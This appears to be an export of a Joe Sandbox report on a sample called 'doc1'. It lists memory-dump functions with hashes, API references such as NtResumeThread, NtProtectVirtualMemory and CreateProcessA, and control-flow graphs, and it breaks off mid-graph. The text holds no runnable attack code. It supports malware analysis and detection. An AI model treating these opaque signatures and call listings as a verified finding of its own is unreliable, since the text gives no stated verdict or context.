                            • Opcode ID: f1644465376dbefe0aad6a17d6bb56c5bbe65e75b27a5bb154ef3f2e224fc13a
                            • Instruction ID: abea903a323daca80a2176fee06ad24bc9af761cde8a600127312bafc0f1c490
                            • Opcode Fuzzy Hash: f1644465376dbefe0aad6a17d6bb56c5bbe65e75b27a5bb154ef3f2e224fc13a
                            • Instruction Fuzzy Hash: A031AAB4D05218DFDB10CFA9D980A9EFBF1BB49310F20942AE919B7300C775A906CF94
                            Function 057FD5A0 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                            Download Yara Rule
                            APIs
                            • NtResumeThread.NTDLL(?,?), ref: 057FD62E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 8c5b7b944b22dc5a37e54885efa9a9e12ea7b9516ca3fc0a1b61b25506bbec3e
                            • Instruction ID: 8c916bdf9b79f0fe778f6efce234b220cc3ac569a88641fcc1651eb0c82e259b
                            • Opcode Fuzzy Hash: 8c5b7b944b22dc5a37e54885efa9a9e12ea7b9516ca3fc0a1b61b25506bbec3e
                            • Instruction Fuzzy Hash: 9A31AAB4D05218DFDB10CFA9D980A9EFBF5BB49310F10942AE919B7300C775A905CF94
                            Function 057FC1C8 Relevance: 1.6, APIs: 1, Instructions: 69nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 057FC15D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: 1e72e8756e07a49ba0168245c6c1a3ad4ee7313b798f4b95c0ee7bb4eea79371
                            • Instruction ID: 29a30bd7dc45212a632ffb68aab1dbd4f502897401287b733d3f562ec653e459
                            • Opcode Fuzzy Hash: 1e72e8756e07a49ba0168245c6c1a3ad4ee7313b798f4b95c0ee7bb4eea79371
                            • Instruction Fuzzy Hash: 7C1167B6C14308EFDB11EBA8E845BCDFBB8AB94320F14841AE519A7390D7346851CB25
                            Function 057FD68F Relevance: 1.6, APIs: 1, Instructions: 60nativethreadCOMMON
                            Download Yara Rule
                            APIs
                            • NtResumeThread.NTDLL(?,?), ref: 057FD62E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 15eebbdf2cbcd208a169dd1cbfe4362f7934af56703d27f0121de26c73be99ad
                            • Instruction ID: f086d503592a1618aef09323124154719aa08be6dec1bd201abbfa47fe5f1d19
                            • Opcode Fuzzy Hash: 15eebbdf2cbcd208a169dd1cbfe4362f7934af56703d27f0121de26c73be99ad
                            • Instruction Fuzzy Hash: 9C1100B6D06218DFDB20DFA8E854BDDFBF0AB99310F14406AE508A7390D7745C06CB61
                            Function 05810408 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 0975f0b0006fa0901ee6d7935c10e11f92b40ad27e0c6e36c42bc3f4cce50010
                            • Instruction ID: 1f04a7b7af9ecf84e7e51b7398cd6a47f8aa42e30e602cd08166a36a06ff323e
                            • Opcode Fuzzy Hash: 0975f0b0006fa0901ee6d7935c10e11f92b40ad27e0c6e36c42bc3f4cce50010
                            • Instruction Fuzzy Hash: B1C1E4B4A05218CFDB54CF69C958BEDBBF6AB89304F1080AAD809B7291DB745E85CF04
                            Function 05810418 Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 48c4ca109b4915ed3aa798f60b169e3772d6e75e539fcf8c26ecb428b2fe1e0d
                            • Instruction ID: 9e14665fe858614aa8e7dbd36c4eff75ab68233b80b60b86b47256de841be5c2
                            • Opcode Fuzzy Hash: 48c4ca109b4915ed3aa798f60b169e3772d6e75e539fcf8c26ecb428b2fe1e0d
                            • Instruction Fuzzy Hash: A3C1E5B4A05218CFEB54DF65C958BEDBBF6BB89304F1080AAD809B7291DB745E85CF04
                            Function 05819B81 Relevance: 1.5, Strings: 1, Instructions: 270COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 3002b57a0c79ff6737958db0cb182a548885c81d5b0a313b8fe2c16028851d37
                            • Instruction ID: a3e3ff33fbec11febbaad1a0c0c9c8b585fb0e6ceadff1f354f3ce25c8c188fb
                            • Opcode Fuzzy Hash: 3002b57a0c79ff6737958db0cb182a548885c81d5b0a313b8fe2c16028851d37
                            • Instruction Fuzzy Hash: 00C1F4B4E06218CFEB14DF69D954BADBBBAFB89304F1090A9D809A7394DB305D85CF05
                            Function 05819B90 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 7a07fb98a45cd979e9122b65ffd0e4e055251bf56667f1e44a2d1095bcfdd8b4
                            • Instruction ID: 5d995ef0249793839eacea71e831c7b92c638b62cab18b0145463478d70f30cd
                            • Opcode Fuzzy Hash: 7a07fb98a45cd979e9122b65ffd0e4e055251bf56667f1e44a2d1095bcfdd8b4
                            • Instruction Fuzzy Hash: 49C1E3B4E06218CFEB14DF69D954BADB7BAFB89304F1090A9D809A7394DB305D85CF05
                            Function 058104BB Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 3a2a19b399330d8b6e6af8d0bb696b8b92dbdce4b0794eb2b247449ae5f15c0d
                            • Instruction ID: 72b163b8e6600a38ca8089d386104ec2f836436770f03ac20f8d92c6a55a6148
                            • Opcode Fuzzy Hash: 3a2a19b399330d8b6e6af8d0bb696b8b92dbdce4b0794eb2b247449ae5f15c0d
                            • Instruction Fuzzy Hash: 84C1D2B4A05218CFDB54DF64D958BEDBBF6FB89304F1080AAD809AB291DB345E85CF05
                            Function 05810910 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 5a88a83c01710eaa6a720c2e8d862d49bbf30bb640f74e47c18e5d156bfb4962
                            • Instruction ID: 0ebc0726be54784a3bdf06a3f6820e8ccf6d8eeefc978f445ab51667765d6e6e
                            • Opcode Fuzzy Hash: 5a88a83c01710eaa6a720c2e8d862d49bbf30bb640f74e47c18e5d156bfb4962
                            • Instruction Fuzzy Hash: 4EB1D4B4905308CFDB54DFA4D858BEDBBF6AB89304F1080AAD809AB291DB345E85CF15
                            Function 0581093A Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 97685dde4ed37da54fa8120d057953164d259bb000087c741d5134078c18b001
                            • Instruction ID: 9c4e7ee80f7482db1c244bab2503e1ffc99112d588ab08f214fc8a63ef327f70
                            • Opcode Fuzzy Hash: 97685dde4ed37da54fa8120d057953164d259bb000087c741d5134078c18b001
                            • Instruction Fuzzy Hash: 7EB1D3B4A05208CFDB54DFA4D958BEDBBF6BB89304F1080AAD809B7291DB745E85CF05
                            Function 05817828 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: I9$+
                            • API String ID: 0-2981498450
                            • Opcode ID: 38a3a550979f608015daeb4537848d78b04ac43439f47c54bab7ffbedf20f6b5
                            • Instruction ID: 01187457c7ef9abefec88bc32060ef8dbeb8c021835fb5630cc9df2a6b80795b
                            • Opcode Fuzzy Hash: 38a3a550979f608015daeb4537848d78b04ac43439f47c54bab7ffbedf20f6b5
                            • Instruction Fuzzy Hash: C8A1C0B4E05208DFDB14CFA9D485BADBBF6FB89304F10806AD819E7295DB746985CF08
                            Function 05817838 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: I9$+
                            • API String ID: 0-2981498450
                            • Opcode ID: 19f76e8b1d0241bbfd6a09c14d648266e162561731ef967bc44d92d57c57d187
                            • Instruction ID: 2a4636382ebff62fe0da993968d77cd67ef786c833b982f1e000e8ddf59935d0
                            • Opcode Fuzzy Hash: 19f76e8b1d0241bbfd6a09c14d648266e162561731ef967bc44d92d57c57d187
                            • Instruction Fuzzy Hash: 1DA1D0B4E05208DFDB14CFA9D485BADBBF6FB89304F10806AD809E7255DB746985CF08
                            Function 057FF843 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 420a6c09e0c0e1f7655b3b5981f87e92af85ed97086f5e2db949ef4a6af96ddd
                            • Instruction ID: 800d00dfab6e6d9d827933a7e50fab8a252ce4cfb8becd8a1812a7999cea4e58
                            • Opcode Fuzzy Hash: 420a6c09e0c0e1f7655b3b5981f87e92af85ed97086f5e2db949ef4a6af96ddd
                            • Instruction Fuzzy Hash: 30A1F474A01258DFEF54DFA4D894BADBBF2FB89300F1090A9D509AB395DB345985CF01
                            Function 057F0470 Relevance: .8, Instructions: 790COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 48fa897f34ade6e1e1750ef63f25f8701647add8e4b0916819006a01a8e78364
                            • Instruction ID: 37e2457535fa4edcd1d550577f2391c094192272e04d44a91d07eddacfec3f1c
                            • Opcode Fuzzy Hash: 48fa897f34ade6e1e1750ef63f25f8701647add8e4b0916819006a01a8e78364
                            • Instruction Fuzzy Hash: 0B626874B007159FCB18DF69C498B6EBBF2FF88300F248529D65A97782DB30A941DB90
                            Function 057E3BC8 Relevance: .6, Instructions: 583COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a95451ae8133ad93218dba5de8703f6639aa4c20009c2f14e7961339b15f680f
                            • Instruction ID: 8d5cfadde19485c28adaae93a2ba5c4e029f31719a423f7f4c4b90e4137cf84c
                            • Opcode Fuzzy Hash: a95451ae8133ad93218dba5de8703f6639aa4c20009c2f14e7961339b15f680f
                            • Instruction Fuzzy Hash: 72322334B002048FDB14DF29C998A6ABBF6FF89710B1584A9E506DB3A5DB31EC42DB51
                            Function 0576EC38 Relevance: .4, Instructions: 358COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9e1daf8162f9f7a4a9e2cdb9ad3978282e94784f86f0e6688b29c270dd0d3f39
                            • Instruction ID: 894d701b391e1bb5109bc8268d0bb0a804c4ab9315cc520ecb8b6432eec92884
                            • Opcode Fuzzy Hash: 9e1daf8162f9f7a4a9e2cdb9ad3978282e94784f86f0e6688b29c270dd0d3f39
                            • Instruction Fuzzy Hash: B7F1F7B4E05229CFDB64CF69D854BA9BBF6FF89300F1080AAD809A7259DB705D85DF10
                            Function 057F7060 Relevance: .3, Instructions: 279COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e5cf5e40f0228e2ab5c2e9dac8d12e31f5645f4e8fa8725001fd7dfc43911b5b
                            • Instruction ID: a337e32843b85a44da2bb18c335b1d531175e6bc4b52430cb2ebdc90851ccac5
                            • Opcode Fuzzy Hash: e5cf5e40f0228e2ab5c2e9dac8d12e31f5645f4e8fa8725001fd7dfc43911b5b
                            • Instruction Fuzzy Hash: 74C1A074D05218DFEB18CFA9D884BADBBB2FF89300F1090AAD50AA7355DB745985DF01
                            Function 057F704F Relevance: .3, Instructions: 269COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ce02bba7504ae961f267c7c8799f0595cdc411a0af34bf237fcd3d0cad85bb41
                            • Instruction ID: 70fd8d1652f8513c94653e7d52666c5da76f41f9ac71057397ebd3dce8bd7a66
                            • Opcode Fuzzy Hash: ce02bba7504ae961f267c7c8799f0595cdc411a0af34bf237fcd3d0cad85bb41
                            • Instruction Fuzzy Hash: AFC1CF74D05218DFEB28CFAAD884BADBBB2FF89300F10906AD509A7355DB705989DF01
                            Function 05766988 Relevance: .2, Instructions: 247COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3f98fb54878750c1bc5a4c10dd428b68d62169ea62f6afc3836ea7a1d6165a14
                            • Instruction ID: 41ff9a9af0e9dd2c6d84044da334a3f04dc6d80930d9bb0945f2caeda740d913
                            • Opcode Fuzzy Hash: 3f98fb54878750c1bc5a4c10dd428b68d62169ea62f6afc3836ea7a1d6165a14
                            • Instruction Fuzzy Hash: 1EB1E8B4E05218CFDB14CFA9D894BADBBF2FF89300F6480AAD849A7255DB705985DF40
                            Function 0576697A Relevance: .2, Instructions: 245COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 96a0737cfd6e4f034f7950e482319ffe4a26ccbf748e17e62c54cadddc430883
                            • Instruction ID: b6e9068d4c7336e9cd878ea845acb382606b9773db2b669a8a0396da3a6a115c
                            • Opcode Fuzzy Hash: 96a0737cfd6e4f034f7950e482319ffe4a26ccbf748e17e62c54cadddc430883
                            • Instruction Fuzzy Hash: B1B1D7B4E05218CFDB24CF69D884BADBBF2FF89300F6480AAD849A7255DB705985DF40
                            Function 05761356 Relevance: 3.8, Strings: 3, Instructions: 45COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 5761356-5761362 1 5761721-5761728 0->1 2 57615f6-57615fd 1->2 3 576172e-5761747 1->3 4 5761603-576160b 2->4 5 57604c1-57604d0 2->5 7 576011f-5760127 3->7 9 576174d-5761755 3->9 4->1 4->7 8 57604d7-576050e 5->8 10 5760130-5761eba 7->10 11 5760129-5760572 7->11 8->7 15 5760514-576051c 8->15 9->7 10->7 17 5760574 11->17 18 5760579-576058c 11->18 15->7 17->18 19 5760593-57605ae 18->19 20 576058e 18->20 22 57605b5-5760622 19->22 23 57605b0 19->23 20->19 22->7 28 5760628-5760630 22->28 23->22 28->7
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: :$W${
                            • API String ID: 0-1563369076
                            • Opcode ID: f4994550f0da36e4922c7f9d6f9cb5868c6c89d2de8c9509fa1eb43b2cc3aec3
                            • Instruction ID: c747325be5fc882f156822567821e2e5896ec8023958118d86024402ed2877bf
                            • Opcode Fuzzy Hash: f4994550f0da36e4922c7f9d6f9cb5868c6c89d2de8c9509fa1eb43b2cc3aec3
                            • Instruction Fuzzy Hash: 70111330806219CFDB29CFA4C98C7DCBBB1BB09314F6411EAC809B3281C7784A85DF11
                            Function 0581BCEA Relevance: 3.8, Strings: 3, Instructions: 43COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 29 581bcea-581bcef 30 581bcf1-581bd1e 29->30 31 581bd4f-581bd57 29->31 30->31 32 581b8c3-581b8ff 31->32 33 581bd5d-581bd68 31->33 41 581b902 call 57fd68f 32->41 42 581b902 call 57fd598 32->42 43 581b902 call 57fd5a0 32->43 39 581b904-581b914 40 581b91e 39->40 40->40 41->39 42->39 43->39
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: )$.$>
                            • API String ID: 0-670635494
                            • Opcode ID: bed750559c2bf924ed0a2055a90adbefc8a52bcd6dd2858a22397395e123897c
                            • Instruction ID: 2c6b8183166ee9a9b6e7e8e6827567c95d9b2db506d816c985cf0f6291411d8a
                            • Opcode Fuzzy Hash: bed750559c2bf924ed0a2055a90adbefc8a52bcd6dd2858a22397395e123897c
                            • Instruction Fuzzy Hash: 571115B59012698FEB68CF60D894BECB7B5BF45300F5080DAC80EA7280CB349E85CF44
                            Function 0581B9A1 Relevance: 3.8, Strings: 3, Instructions: 30COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 44 581b9a1-581b9c5 60 581b9cb call 581c4b1 44->60 61 581b9cb call 581c4c0 44->61 46 581b9d1-581ba0b 47 581ba11-581ba1c 46->47 48 581aff5-581affe 46->48 47->48 49 581b000 48->49 50 581b007-581bc44 48->50 49->50 52 581bc4a-581bc55 50->52 53 581b18e-581b1bf 50->53 52->48 57 581b1c1 53->57 58 581b1c6-581b1f1 53->58 57->58 58->48 59 581b1f7-581b202 58->59 59->48 60->46 61->46
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: <$E$
                            • API String ID: 0-763103881
                            • Opcode ID: 22165434bf5e1ae08472776306d4a7cc44c94c47041a8355373f8690d6d80073
                            • Instruction ID: 2a68769976de88259f72004efec4e066026c6486cf18de28d7c418cac1a04dad
                            • Opcode Fuzzy Hash: 22165434bf5e1ae08472776306d4a7cc44c94c47041a8355373f8690d6d80073
                            • Instruction Fuzzy Hash: BE01007190425ADBCB61CF68C884BD9B7B5FB44300F108695E80DA7290CB31AAC5CF44
                            Function 057EC0C7 Relevance: 3.1, Strings: 2, Instructions: 587COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: C{m^$D{m^
                            • API String ID: 0-148523534
                            • Opcode ID: a8c0c7d5eda051f3e890d874d8c128168ca062bd99c6fe9802a1ce546daa495c
                            • Instruction ID: 4819eb49c81ae19288b9a2842a7759caf3e5f43846d63d68b86847c7e6069106
                            • Opcode Fuzzy Hash: a8c0c7d5eda051f3e890d874d8c128168ca062bd99c6fe9802a1ce546daa495c
                            • Instruction Fuzzy Hash: 142204756093908FCB17AF7CD864BA97F75BF4A314F0940DAD0859B293DA308C49DBA2
                            Function 05A8198D Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 530 5a8198d-5a81a51 544 5a81a57 call 5764db2 530->544 545 5a81a57 call 5764df8 530->545 546 5a81a57 call 5764e08 530->546 539 5a81a5d-5a81a6a 540 5a829ee-5a82a09 539->540 541 5a81a70-5a81a71 539->541 542 5a82a1b-5a82a35 540->542 543 5a82a0b-5a82a11 540->543 541->540 543->542 544->539 545->539 546->539
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304800385.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5a80000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: /$
                            • API String ID: 0-2097186568
                            • Opcode ID: 4998be9bd5996891e8751e821b86d1ba62a605b6119bf907924fc954fb1e72bc
                            • Instruction ID: 5267521940a5d439d8fbf3be4a40236ac312d83f1d395170c395229051161d0c
                            • Opcode Fuzzy Hash: 4998be9bd5996891e8751e821b86d1ba62a605b6119bf907924fc954fb1e72bc
                            • Instruction Fuzzy Hash: D3310678A042288FCB64DF68C888ADAB7F6FB89340F1041E9E419A7394C7309EC5CF41
                            Function 0581B389 Relevance: 2.5, Strings: 2, Instructions: 35COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 547 581b389-581b38d 548 581b393-581b3b5 547->548 549 581bbd6-581bc12 547->549 550 581aff5-581affe 548->550 551 581b3bb-581b3c6 548->551 565 581bc18 call 581db49 549->565 566 581bc18 call 581db58 549->566 553 581b000 550->553 554 581b007-581bc44 550->554 551->549 551->550 553->554 557 581bc4a-581bc55 554->557 558 581b18e-581b1bf 554->558 556 581bc1e-581bc3b 557->550 562 581b1c1 558->562 563 581b1c6-581b1f1 558->563 562->563 563->550 564 581b1f7-581b202 563->564 564->550 565->556 566->556
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: +$=
                            • API String ID: 0-1658445220
                            • Opcode ID: 8548d1db3eed6ed2e5139a1af695ce97bc4ecee29d01df4b412692e1672ae374
                            • Instruction ID: 0e8eb389602ba33c4f02f7c1c2b5bffb1ad5a3d02832791b217ad96afc34091f
                            • Opcode Fuzzy Hash: 8548d1db3eed6ed2e5139a1af695ce97bc4ecee29d01df4b412692e1672ae374
                            • Instruction Fuzzy Hash: 8A115DB4906228CFDB65CF28D988BECBBB5BB09344F0080DAE949A6290D7755ED4CF44
                            Function 057604BE Relevance: 2.5, Strings: 2, Instructions: 24COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 567 57604be-57604d0 569 57604d7-576050e 567->569 571 5760514-576051c 569->571 572 576011f-5760127 569->572 571->572 573 5760130-5761eba 572->573 574 5760129-5760572 572->574 573->572 578 5760574 574->578 579 5760579-576058c 574->579 578->579 580 5760593-57605ae 579->580 581 576058e 579->581 583 57605b5-5760622 580->583 584 57605b0 580->584 581->580 583->572 589 5760628-5760630 583->589 584->583 589->572
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: W${
                            • API String ID: 0-2693638197
                            • Opcode ID: 70656d1417713e1c1e538a2910373dabcacf0b363b37a9f57cd35387e04ce43c
                            • Instruction ID: 8d21299cd22a3af380083878da7656fbe805b5d5ddc712f5b36dbd8ad1006e61
                            • Opcode Fuzzy Hash: 70656d1417713e1c1e538a2910373dabcacf0b363b37a9f57cd35387e04ce43c
                            • Instruction Fuzzy Hash: 3DF0AF70916229CFDB25DF64D988BDDBBB2BB09311F6451D9D408B6240C7389BC5DF11
                            Function 057FC904 Relevance: 1.8, APIs: 1, Instructions: 264processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 923 57fc904-57fc9a2 926 57fc9eb-57fca13 923->926 927 57fc9a4-57fc9bb 923->927 930 57fca59-57fcaaf 926->930 931 57fca15-57fca29 926->931 927->926 932 57fc9bd-57fc9c2 927->932 940 57fcaf5-57fcb8a CreateProcessA 930->940 941 57fcab1-57fcac5 930->941 931->930 942 57fca2b-57fca30 931->942 933 57fc9e5-57fc9e8 932->933 934 57fc9c4-57fc9ce 932->934 933->926 937 57fc9d2-57fc9e1 934->937 938 57fc9d0 934->938 937->937 939 57fc9e3 937->939 938->937 939->933 954 57fcb8c-57fcb92 940->954 955 57fcb93-57fcc09 940->955 941->940 949 57fcac7-57fcacc 941->949 943 57fca53-57fca56 942->943 944 57fca32-57fca3c 942->944 943->930 946 57fca3e 944->946 947 57fca40-57fca4f 944->947 946->947 947->947 950 57fca51 947->950 951 57fcaef-57fcaf2 949->951 952 57fcace-57fcad8 949->952 950->943 951->940 956 57fcadc-57fcaeb 952->956 957 57fcada 952->957 954->955 963 57fcc0b-57fcc0f 955->963 964 57fcc19-57fcc1d 955->964 956->956 958 57fcaed 956->958 957->956 958->951 963->964 965 57fcc11 963->965 966 57fcc1f-57fcc23 964->966 967 57fcc2d-57fcc31 964->967 965->964 966->967 970 57fcc25 966->970 968 57fcc33-57fcc37 967->968 969 57fcc41 967->969 968->969 971 57fcc39 